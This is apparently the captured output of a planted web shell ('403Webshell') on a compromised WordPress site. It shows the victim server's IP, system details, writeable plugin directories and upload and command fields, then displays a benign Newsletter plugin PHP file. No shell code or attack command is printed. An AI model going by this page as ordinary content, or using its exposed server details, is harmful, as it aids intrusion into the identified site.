403Webshell
Server IP : 207.135.97.11  /  Your IP : 172.19.0.1
Web Server : LiteSpeed
System : Linux 6d372a2d2e33 5.14.0-611.24.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Jan 23 11:42:43 UTC 2026 x86_64
User : nobody ( 65534)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/html/ed.net.au/wp-content/plugins/newsletter/main/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/ed.net.au/wp-content/plugins/newsletter/main/autorespondercomposer.php
<?php

defined('ABSPATH') || exit;

require_once NEWSLETTER_INCLUDES_DIR . '/controls.php';
$controls = new NewsletterControls();

$autoresponder = new stdClass();
$autoresponder->id = 1;
$autoresponder->name = 'Welcome email series';
$autoresponder->list = 0;
$autoresponder->status = 1;
$autoresponder->subscribers = 346;
$autoresponder->emails = [1, 2, 3];
$autoresponder->list_name = 'Not linked to a list';

$email = new stdClass();
$email->id = 1;
$email->subject = 'What you should not miss at all';
$email->options = ['delay' => 24];

TNP_Composer::prepare_controls($controls, $email);
?>
<div class="wrap" id="tnp-wrap">


    <?php $controls->show(); ?>


    <div id="tnp-body">

        <form id="tnpc-form" method="post" action="" onsubmit="tnpc_save(this); return true;">
            <?php $controls->init(); ?>
            <p>
                <?php $controls->button_back('?page=newsletter_main_autorespondermessages', '') ?>
            </p>

            <table class="form-table" style="width: auto; margin-bottom: 20px">
                <tr>
                    <th>Delay (hours)</th>
                    <td><?php $controls->text('options_delay') ?></td>
                </tr>
            </table>

            <?php $controls->composer_fields_v2() ?>

        </form>

        <?php $controls->composer_load_v2(true, false, 'autoresponder') ?>
    </div>

</div>

Youez - 2016 - github.com/yon3zu
LinuXploit